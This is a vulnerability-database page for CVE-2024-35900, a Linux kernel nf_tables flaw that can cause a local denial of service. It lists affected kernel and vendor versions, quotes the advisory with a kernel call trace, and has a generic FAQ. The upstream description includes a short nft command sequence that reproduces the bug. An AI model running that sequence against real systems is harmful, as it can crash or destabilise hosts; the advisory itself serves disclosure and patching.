CVE-2024-35900: netfilter: nf_tables: reject new basechain after table flag update

Q: What is the severity of CVE-2024-35900?

CVE-2024-35900 has been categorized to allow for a description of its severity based on the impact and exploitability of the issue.

Q: How do I fix CVE-2024-35900?

To fix CVE-2024-35900, ensure that your Linux kernel is updated to the appropriate version specified in the remedy details.

Q: What versions of the Linux kernel are affected by CVE-2024-35900?

CVE-2024-35900 affects several versions of the Linux kernel, specifically those prior to the specified remedial versions based on the source.

Q: Who is responsible for addressing CVE-2024-35900?

The Linux kernel CVE team is responsible for addressing CVE-2024-35900, identifying it, and coordinating fixes.

Q: Are there any workarounds for CVE-2024-35900?

Currently, the recommended approach for CVE-2024-35900 is to apply the provided updates, as there are no known effective workarounds.

Published May 19, 2024

Updated

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nftables: reject new basechain after table flag update

The Linux kernel CVE team has assigned CVE-2024-35900 to this issue.

Upstream advisory: https://lore.kernel.org/linux-cve-announce/2024051952-CVE-2024-35900-c2c9@gregkh/T

Other sources

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nftables: reject new basechain after table flag update

When dormant flag is toggled, hooks are disabled in the commit phase by iterating over current chains in table (existing and new).

The following configuration allows for an inconsistent state:

add table x add chain x y { type filter hook input priority 0; } add table x { flags dormant; } add chain x w { type filter hook input priority 1; }

which triggers the following warning when trying to unregister chain w which is already unregistered.

[ 127.322252] WARNING: CPU: 7 PID: 1211 at net/netfilter/core.c:50 1 nfunregisternethook+0x21a/0x260 [...] [ 127.322519] Call Trace: [ 127.322521] <TASK> [ 127.322524] ? warn+0x9f/0x1a0 [ 127.322531] ? nfunregisternethook+0x21a/0x260 [ 127.322537] ? reportbug+0x1b1/0x1e0 [ 127.322545] ? handlebug+0x3c/0x70 [ 127.322552] ? excinvalidop+0x17/0x40 [ 127.322556] ? asmexcinvalidop+0x1a/0x20 [ 127.322563] ? kasansavefreeinfo+0x3b/0x60 [ 127.322570] ? nfunregisternethook+0x6a/0x260 [ 127.322577] ? nfunregisternethook+0x21a/0x260 [ 127.322583] ? nfunregisternethook+0x6a/0x260 [ 127.322590] ? nftablesunregisterhook+0x8a/0xe0 [nftables] [ 127.322655] nfttabledisable+0x75/0xf0 [nftables] [ 127.322717] nftablescommit+0x2571/0x2620 [nftables]

— NVD

Linux Kernel is vulnerable to a denial of service, caused by a flaw when trying to unregister and already unregistered chain. By sending a specially crafted request, a local authenticated attacker could exploit this vulnerability to cause a denial of service condition.

— IBM

Affected Software

25 affected componentsFixes available

IBM Security Verify Governance<=ISVG 10.0.2

IBM Security Verify Governance, Identity Manager Software Stack<=ISVG 10.0.2

IBM Security Verify Governance, Identity Manager Virtual Appliance<=ISVG 10.0.2

IBM Security Verify Governance Identity Manager Container<=ISVG 10.0.2

debian/linux

5.10.223-15.10.234-16.1.129-16.1.135-16.12.25-16.12.27-1

redhat/kernel<5.4.274

5.4.274

redhat/kernel<5.10.215

5.10.215

redhat/kernel<5.15.154

5.15.154

redhat/kernel<6.1.85

6.1.85

redhat/kernel<6.6.26

6.6.26

redhat/kernel<6.8.5

6.8.5

redhat/kernel<6.9

6.9

Linux Linux kernel>=5.4.262<5.4.274

Linux Linux kernel>=5.10.202<5.10.215

Linux Linux kernel>=5.13.1<5.15.154

Linux Linux kernel>=5.16<6.1.85

Linux Linux kernel>=6.2<6.6.26

Linux Linux kernel>=6.7<6.8.5

Linux Linux kernel=5.13

Linux Linux kernel=5.13-rc5

Linux Linux kernel=5.13-rc6

Linux Linux kernel=5.13-rc7

Linux Linux kernel=6.9-rc1

Linux Linux kernel=6.9-rc2

Debian Debian Linux=10.0

Remediation

Event History

May 19, 2024

CVE Published

via MITRE·08:34 AM

Data Sourced

via MITRE·08:34 AM

Description

Data Sourced

via NVD·09:15 AM

Description

Data Sourced

via NVD·09:15 AM

RemedySeverityAffected Software

May 20, 2024

Data Sourced

via Red Hat·11:17 AM

DescriptionSeverityAffected Software

Jul 11, 2024

Data Sourced

via Launchpad·07:46 PM

Description

Apr 27, 2025

Data Sourced

via Ubuntu·12:21 AM

RemedyDescriptionSeverityAffected Software

Parent advisories

This vulnerability appears in the following advisories.

IBM-7230443

Frequently Asked Questions

What is the severity of CVE-2024-35900?

CVE-2024-35900 has been categorized to allow for a description of its severity based on the impact and exploitability of the issue.

How do I fix CVE-2024-35900?

To fix CVE-2024-35900, ensure that your Linux kernel is updated to the appropriate version specified in the remedy details.

What versions of the Linux kernel are affected by CVE-2024-35900?

CVE-2024-35900 affects several versions of the Linux kernel, specifically those prior to the specified remedial versions based on the source.

Who is responsible for addressing CVE-2024-35900?

The Linux kernel CVE team is responsible for addressing CVE-2024-35900, identifying it, and coordinating fixes.

Are there any workarounds for CVE-2024-35900?

Currently, the recommended approach for CVE-2024-35900 is to apply the provided updates, as there are no known effective workarounds.

CVE-2024-35900: netfilter: nf_tables: reject new basechain after table flag update

Other sources

Affected Software

Remediation

Patch Available

Patch Available

Patch Available

Patch Available

Patch Available

Patch Available

Patch Available

Patch Available

Event History

Parent advisories

Don't miss critical vulnerabilities

Frequently Asked Questions

What is the severity of CVE-2024-35900?

How do I fix CVE-2024-35900?

What versions of the Linux kernel are affected by CVE-2024-35900?

Who is responsible for addressing CVE-2024-35900?

Are there any workarounds for CVE-2024-35900?

Company

Resources

Contact